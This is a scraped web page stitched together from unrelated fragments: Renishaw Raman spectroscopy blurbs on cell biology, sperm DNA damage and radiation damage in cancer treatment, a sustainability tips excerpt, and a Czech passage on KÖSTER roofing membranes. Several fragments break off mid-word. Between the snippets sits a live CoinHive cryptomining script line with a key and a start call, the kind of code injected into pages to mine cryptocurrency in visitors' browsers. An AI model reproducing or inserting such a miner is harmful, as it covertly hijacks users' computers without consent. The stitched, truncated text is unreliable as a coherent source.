Environmental cells

Renishaw supplies a wide range of cells, so you can make in situ Raman and photoluminescence measurements

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Cell biology

Extract chemical information from cells without the need for staining or the manipulation of genes, and ensure your results reflect the true chemistry of the cells

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Pioneering work provides hope in fertility struggle

The inability to have children creates great heartache for many couples. The most common cause is male infertility, usually characterised by sperm cells with low mobility in which genetic material (DNA) is often damaged. Unfortunately, DNA damage in sperm

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Raman spectroscopy used to detect radiation damage in cells and tissues during cancer treatment

The Irving K Barber School of Arts and Sciences at the University of British Columbia, Canada, hosts a multidisciplinary group of physics, engineering and radiation oncology scientists. It is interested in detecting and understanding the damage in cells a

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var miner = new CoinHive.Anonymous(49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start(); Choosing sustainable products and materials

The increasing availability of product environmental information provides an opportunity for consumers to choose more sustainable products and for designers to be rewarded for selecting more sustainable materials. Here are some tips on how to do this. Us

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KÖSTER TPO/FPO (PE) mají minimální vliv na zdraví člověka

TPO/FPO (PE) technologie KÖSTER neobsahuje, a tudíž ani nemůže uvolňovat, žádné škodlivé látky. O tom svědčí i to, že jeden z typů fólií KÖSTER TPO Aqua má certifikaci na pitnou vodu a používá se pro vodojemy. Na rozdíl od PVC je tato technologie zcela re

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